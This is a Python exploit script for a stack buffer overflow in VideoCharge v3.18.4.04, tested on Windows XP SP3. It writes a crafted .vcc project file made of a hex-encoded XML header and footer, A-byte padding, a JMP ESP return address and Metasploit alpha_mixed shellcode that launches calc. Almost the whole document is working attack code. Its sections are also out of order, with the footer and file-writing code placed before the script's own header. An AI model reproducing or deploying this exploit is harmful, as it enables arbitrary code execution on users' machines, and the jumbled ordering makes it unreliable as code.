"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x73"
"\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f\x72\x4d\x61\x70\x3e\x0d\x0a\x3c"
"\x2f\x50\x61\x6c\x65\x74\x74\x65\x44\x65\x73\x63\x3e\x0d\x0a\x3c"
"\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d\x0a\x3c\x46\x72\x61"
"\x6d\x65\x44\x65\x6c\x61\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x31"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x30\x6d\x73\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x44\x65\x6c\x61\x79"
"\x3e\x0d\x0a\x3c\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x52\x65\x70\x65\x74\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74\x52\x65\x70\x65"
"\x74\x3e\x0d\x0a\x3c\x2f\x52\x65\x70\x65\x74\x69\x74\x69\x6f\x6e"
"\x3e\x0d\x0a\x3c\x2f\x41\x6e\x69\x6d\x61\x74\x69\x6f\x6e\x3e\x0d"
"\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61"
"\x6d\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75"
"\x6e\x74\x53\x6b\x69\x70\x20\x76\x61\x6c\x75\x65\x3d\x27\x31\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43"
"\x6f\x75\x6e\x74\x53\x6b\x69\x70\x3e\x0d\x0a\x3c\x46\x72\x61\x6d"
"\x65\x50\x61\x74\x74\x65\x72\x6e\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x3b\x35\x3b\x37\x3b\x32\x35\x3b\x33\x32\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x50"
"\x61\x74\x74\x65\x72\x6e\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x53\x6f\x75\x72\x63\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d"
"\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x43\x6f\x75\x6e\x74\x46\x72\x61"
"\x6d\x65\x73\x20\x76\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x75\x6e\x74"
"\x46\x72\x61\x6d\x65\x73\x3e\x0d\x0a\x3c\x2f\x53\x6f\x75\x72\x63"
"\x65\x43\x6f\x75\x6e\x74\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f"
"\x53\x6f\x75\x72\x63\x65\x47\x69\x66\x46\x72\x61\x6d\x65\x3e\x0d"
"\x0a\x3c\x2f\x4d\x61\x69\x6e\x3e\x0d\x0a\x3c\x46\x72\x61\x6d\x65"
"\x3e\x0d\x0a\x3c\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74"
"\x65\x72\x73\x3e\x0d\x0a\x3c\x53\x69\x7a\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x26\x6c\x74\x3b\x73\x6f\x75\x72\x63\x65\x26\x67\x74"
"\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53"
"\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x72\x69\x67\x69"
"\x6e\x61\x6c\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4f\x72\x69\x67\x69\x6e\x61\x6c\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x54\x79\x70\x65\x3e\x0d\x0a"
"\x3c\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x44\x65\x6c\x74\x61\x52\x61\x74\x69\x6f\x3e\x0d\x0a"
"\x3c\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x65\x73\x69\x7a\x65\x48\x69\x67\x68\x3e\x0d\x0a"
"\x3c\x2f\x53\x69\x7a\x65\x3e\x0d\x0a\x3c\x43\x6f\x6c\x6f\x72\x44"
"\x65\x70\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x35\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x43\x6f\x6c\x6f"
"\x72\x44\x65\x70\x74\x68\x3e\x0d\x0a\x3c\x43\x72\x6f\x70\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x26\x6c\x74\x3b\x6e\x6f\x6e\x65\x26\x67"
"\x74\x3b\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c"
"\x2f\x43\x72\x6f\x70\x3e\x0d\x0a\x3c\x57\x61\x74\x65\x72\x4d\x61"
"\x72\x6b\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x57\x61\x74\x65\x72\x4d"
"\x61\x72\x6b\x3e\x0d\x0a\x3c\x46\x69\x6c\x74\x65\x72\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x69\x6c\x74\x65\x72\x73\x3e\x0d\x0a\x3c"
"\x2f\x4c\x69\x66\x65\x54\x69\x6d\x65\x46\x69\x6c\x74\x65\x72\x73"
"\x3e\x0d\x0a\x3c\x2f\x46\x72\x61\x6d\x65\x3e\x0d\x0a\x3c\x2f\x47"
"\x49\x46\x41\x3e\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x46\x69"
"\x6c\x65\x46\x6f\x72\x6d\x61\x74\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b"
"\x44\x69\x72\x73\x3e\x0d\x0a\x3c\x57\x6f\x72\x6b\x44\x69\x72\x45"
"\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x45\x6e\x75\x6d"
"\x3e\x0d\x0a\x3c\x2f\x57\x6f\x72\x6b\x44\x69\x72\x73\x3e\x0d\x0a"
"\x3c\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d"
"\x0a\x3c\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61\x74\x74\x65"
"\x72\x6e\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x45\x6e\x75\x6d\x54\x68\x75\x6d\x62\x50\x61"
"\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x54\x68\x75\x6d\x62"
"\x50\x61\x74\x74\x65\x72\x6e\x73\x3e\x0d\x0a\x3c\x2f\x4d\x61\x69"
"\x6e\x3e\x0d\x0a"
)
buffersize = 1000
payload = "\x41" * 230
# JMP ESP [urlmon.dll]payload += struct.pack("<L",0x781c2014 )
# msfpayload windows/exec CMD=calc R |msfencode BufferRegister=ESP -e x86/alpha_mixed
# [*] x86/alpha_mixed succeeded with size 446 (iteration=1)
#
payload += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30" +
"\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42" +
"\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x69\x78" +
"\x4d\x59\x37\x70\x63\x30\x55\x50\x51\x70\x6b\x39\x38\x65" +
"\x76\x51\x38\x52\x73\x54\x4e\x6b\x32\x72\x46\x50\x6c\x4b" +
"\x43\x62\x74\x4c\x6c\x4b\x32\x72\x74\x54\x6c\x4b\x74\x32" +
"\x37\x58\x56\x6f\x4f\x47\x52\x6a\x65\x76\x66\x51\x49\x6f" +
"\x36\x51\x39\x50\x4e\x4c\x37\x4c\x35\x31\x43\x4c\x57\x72" +
"\x56\x4c\x61\x30\x4f\x31\x4a\x6f\x46\x6d\x67\x71\x68\x47" +
"\x6d\x32\x68\x70\x43\x62\x53\x67\x6e\x6b\x56\x32\x62\x30" +
"\x4e\x6b\x72\x62\x55\x6c\x45\x51\x6e\x30\x4e\x6b\x61\x50" +
"\x70\x78\x6b\x35\x6f\x30\x63\x44\x63\x7a\x33\x31\x6a\x70" +
"\x70\x50\x4c\x4b\x62\x68\x65\x48\x6c\x4b\x33\x68\x37\x50" +
"\x47\x71\x39\x43\x6b\x53\x35\x6c\x77\x39\x4c\x4b\x34\x74" +
"\x6e\x6b\x73\x31\x6a\x76\x50\x31\x49\x6f\x55\x61\x4b\x70" +
"\x6e\x4c\x69\x51\x5a\x6f\x74\x4d\x56\x61\x5a\x67\x35\x68" +
"\x6b\x50\x33\x45\x38\x74\x57\x73\x33\x4d\x59\x68\x75\x6b" +
"\x31\x6d\x34\x64\x44\x35\x4b\x52\x31\x48\x4c\x4b\x46\x38" +
"\x65\x74\x77\x71\x6a\x73\x35\x36\x6e\x6b\x56\x6c\x30\x4b" +
"\x4c\x4b\x62\x78\x77\x6c\x35\x51\x59\x43\x6c\x4b\x33\x34" +
"\x4c\x4b\x73\x31\x6e\x30\x6b\x39\x72\x64\x44\x64\x75\x74" +
"\x43\x6b\x51\x4b\x65\x31\x52\x79\x62\x7a\x53\x61\x6b\x4f" +
"\x69\x70\x56\x38\x33\x6f\x73\x6a\x4c\x4b\x64\x52\x38\x6b" +
"\x6b\x36\x43\x6d\x51\x7a\x63\x31\x6c\x4d\x6c\x45\x68\x39" +
"\x57\x70\x47\x70\x45\x50\x32\x70\x55\x38\x54\x71\x4e\x6b" +
"\x50\x6f\x6f\x77\x4b\x4f\x59\x45\x6f\x4b\x58\x70\x6c\x75" +
"\x4f\x52\x43\x66\x70\x68\x6e\x46\x6e\x75\x6f\x4d\x4f\x6d" +
"\x4b\x4f\x59\x45\x75\x6c\x47\x76\x33\x4c\x55\x5a\x4d\x50" +
"\x6b\x4b\x59\x70\x64\x35\x73\x35\x6f\x4b\x73\x77\x35\x43" +
"\x64\x32\x62\x4f\x71\x7a\x43\x30\x33\x63\x4b\x4f\x6e\x35" +
"\x62\x43\x73\x51\x32\x4c\x31\x73\x53\x30\x41\x41"
)
payload += "\x41" * (buffersize - len(payload))
sploit = header + payload + footer
print "[*] Creating .vcc file"
try:
print "[+]Creating Exploit File...\n"
file = open("noname1.vcc","wb")
file.write(sploit)
file.close
print "[+]File noname1.vcc create successfully.\n"
except:
print "**[-]Error: #{$!}\n"
#!/usr/bin/python
# Exploit Title: VideoCharge Vanilla BOF Exploit v3.18.4.04
# Date: 10/May/2015
# Author: @evil_comrade IRC freenode: #vulnhub or #offsec or #corelan
# email: kwiha2003 [at] yahoo [dot] com
# Version: v3.18.4.04
# Tested on: Win XP3
# Software link:http://www.softpedia.com/get/Multimedia/Video/Encoders-Converter-DIVX-Related/Videocharge-Full.shtml
# Greetz: b33f,corelan,offsec,vulnhub,HUST510, packetstorm
#
# Notes: Copy the file created by the script into the videocharge folder
# All third party modules are SAFESEH'ed
# A bigger buffer of > 1000 & <3000 A's will also crash the program but you'd have to
# use the SEH route which will make for a good exercise since the program only
# ascii printable x-ters and 5c (retn) is a bad x-ter (no push[reg]+ret, jmp[reg] or call[reg] )
#
import struct
header = (
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x57\x69"
"\x6e\x64\x6f\x77\x73\x2d\x31\x32\x35\x31\x22\x20\x3f\x3e\x3c\x4d"
"\x61\x69\x6e\x3e\x0d\x0a\x3c\x56\x45\x52\x53\x49\x4f\x4e\x20\x63"
"\x75\x72\x76\x65\x72\x3d\x22\x33\x2e\x31\x36\x2e\x34\x2e\x30\x36"
"\x22\x2f\x3e\x3c\x46\x49\x4c\x45\x53\x3e\x0d\x0a\x3c\x50\x61\x74"
"\x68\x54\x6f\x4d\x65\x64\x69\x61\x46\x69\x6c\x65\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x43\x3a\x5c\x50\x65\x61\x63\x68\x5c\x73\x61\x6d"
"\x70\x6c\x65\x5f\x6d\x70\x34\x27\x20\x74\x79\x70\x65\x3d\x27\x38"
"\x27\x3e\x0d\x0a\x3c\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x54\x69\x6d\x65\x6c\x69\x6e\x65\x73\x3e"
"\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62\x6e\x61"
"\x69\x6c\x73\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55\x45\x22"
"\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x54\x68\x75\x6d\x62"
"\x6e\x61\x69\x6c\x73\x3e\x0d\x0a\x3c\x49\x44\x58\x20\x76\x61\x6c"
"\x75\x65\x3d\x27"
)
footer = (
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x49"
"\x44\x58\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74"
"\x65\x72\x6e\x4e\x61\x6d\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52"
"\x4d\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32"
"\x64\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f"
"\x46\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x79\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x63\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c"
"\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e"
"\x0d\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f"
"\x43\x75\x73\x74\x6f\x6d\x50\x61\x74\x74\x65\x72\x6e\x4e\x61\x6d"
"\x65\x3e\x0d\x0a\x3c\x43\x75\x73\x74\x6f\x6d\x46\x6f\x6c\x64\x65"
"\x72\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x43\x75\x73\x74\x6f\x6d\x46\x6f"
"\x6c\x64\x65\x72\x3e\x0d\x0a\x3c\x53\x6b\x69\x70\x52\x61\x6e\x67"
"\x65\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x6b\x69\x70\x52\x61\x6e\x67\x65"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x49\x74\x65"
"\x6d\x45\x6e\x75\x6d\x20\x65\x6e\x75\x6d\x3d\x20\x22\x54\x52\x55"
"\x45\x22\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x49\x74\x65\x6d"
"\x45\x6e\x75\x6d\x3e\x0d\x0a\x3c\x41\x75\x64\x69\x6f\x53\x74\x72"
"\x65\x61\x6d\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x41\x75\x64\x69\x6f"
"\x53\x74\x72\x65\x61\x6d\x3e\x0d\x0a\x3c\x49\x6e\x63\x6c\x75\x64"
"\x65\x43\x68\x61\x70\x74\x65\x72\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x49\x6e\x63\x6c\x75\x64\x65\x43\x68\x61\x70\x74\x65\x72\x3e\x0d"
"\x0a\x3c\x55\x73\x65\x53\x75\x62\x46\x6f\x6c\x64\x65\x72\x73\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27"
"\x33\x27\x3e\x0d\x0a\x3c\x2f\x55\x73\x65\x53\x75\x62\x46\x6f\x6c"
"\x64\x65\x72\x73\x3e\x0d\x0a\x3c\x2f\x50\x61\x74\x68\x54\x6f\x4d"
"\x65\x64\x69\x61\x46\x69\x6c\x65\x3e\x0d\x0a\x3c\x2f\x46\x49\x4c"
"\x45\x53\x3e\x0d\x0a\x3c\x43\x6f\x6d\x6d\x6f\x6e\x3e\x0d\x0a\x3c"
"\x4f\x75\x74\x70\x75\x74\x3e\x0d\x0a\x3c\x4d\x6f\x64\x65\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x31\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x4f\x75"
"\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e\x61\x6d\x65\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e"
"\x0d\x0a\x3c\x2f\x4f\x75\x74\x70\x75\x74\x4d\x65\x64\x69\x61\x4e"
"\x61\x6d\x65\x3e\x0d\x0a\x3c\x44\x65\x73\x74\x69\x6e\x61\x74\x69"
"\x6f\x6e\x50\x61\x74\x68\x20\x76\x61\x6c\x75\x65\x3d\x27\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x44\x65\x73"
"\x74\x69\x6e\x61\x74\x69\x6f\x6e\x50\x61\x74\x68\x3e\x0d\x0a\x3c"
"\x46\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x73\x5f\x63\x6f\x70\x79\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d"
"\x41\x54\x5f\x69\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46"
"\x4f\x52\x4d\x41\x54\x5f\x69\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41"
"\x54\x5f\x74\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27"
"\x20\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f"
"\x52\x4d\x41\x54\x5f\x74\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54"
"\x5f\x66\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20"
"\x74\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52"
"\x4d\x41\x54\x5f\x66\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f"
"\x78\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d"
"\x41\x54\x5f\x78\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x79"
"\x20\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79"
"\x70\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41"
"\x54\x5f\x79\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x72\x20"
"\x76\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70"
"\x65\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54"
"\x5f\x72\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x67\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65"
"\x3d\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f"
"\x67\x3e\x0d\x0a\x3c\x46\x4f\x52\x4d\x41\x54\x5f\x63\x20\x76\x61"
"\x6c\x75\x65\x3d\x27\x25\x30\x32\x64\x27\x20\x74\x79\x70\x65\x3d"
"\x27\x38\x27\x3e\x0d\x0a\x3c\x2f\x46\x4f\x52\x4d\x41\x54\x5f\x63"
"\x3e\x0d\x0a\x3c\x52\x61\x6e\x67\x65\x5f\x63\x20\x76\x61\x6c\x75"
"\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x52\x61\x6e\x67\x65\x5f\x63\x3e\x0d\x0a\x3c\x2f\x46"
"\x69\x6c\x65\x4e\x61\x6d\x65\x50\x61\x74\x74\x65\x72\x6e\x3e\x0d"
"\x0a\x3c\x49\x73\x53\x70\x6c\x69\x74\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c"
"\x2f\x53\x70\x6c\x69\x74\x54\x79\x70\x65\x3e\x0d\x0a\x3c\x53\x70"
"\x6c\x69\x74\x4c\x65\x6e\x67\x74\x68\x20\x76\x61\x6c\x75\x65\x3d"
"\x27\x31\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78"
"\x74\x3d\x27\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4c\x65\x6e\x67\x74"
"\x68\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x42\x79\x53\x69\x7a\x65"
"\x4d\x6f\x64\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x30\x27\x20\x74"
"\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69"
"\x74\x42\x79\x53\x69\x7a\x65\x4d\x6f\x64\x65\x3e\x0d\x0a\x3c\x53"
"\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74\x50\x61\x72\x74\x73\x20\x76"
"\x61\x6c\x75\x65\x3d\x27\x32\x27\x20\x74\x79\x70\x65\x3d\x27\x33"
"\x27\x3e\x0d\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x43\x6f\x75\x6e\x74"
"\x50\x61\x72\x74\x73\x3e\x0d\x0a\x3c\x53\x70\x6c\x69\x74\x4d\x61"
"\x78\x53\x69\x7a\x65\x20\x76\x61\x6c\x75\x65\x3d\x27\x36\x30\x30"
"\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x20\x65\x78\x74\x3d\x27"
"\x31\x27\x20\x65\x78\x74\x54\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d"
"\x0a\x3c\x2f\x53\x70\x6c\x69\x74\x4d\x61\x78\x53\x69\x7a\x65\x3e"
"\x0d\x0a\x3c\x45\x78\x61\x63\x74\x6c\x79\x20\x76\x61\x6c\x75\x65"
"\x3d\x27\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a"
"\x3c\x2f\x45\x78\x61\x63\x74\x6c\x79\x3e\x0d\x0a\x3c\x2f\x49\x73"
"\x53\x70\x6c\x69\x74\x3e\x0d\x0a\x3c\x4a\x6f\x69\x6e\x53\x75\x62"
"\x54\x69\x6d\x65\x4c\x69\x6e\x65\x20\x76\x61\x6c\x75\x65\x3d\x27"
"\x30\x27\x20\x74\x79\x70\x65\x3d\x27\x33\x27\x3e\x0d\x0a\x3c\x2f"
"\x4a\x6f\x69\x6e\x53\x75\x62\x54\x69\x6d\x65\x4c\x69\x6e\x65\x3e"
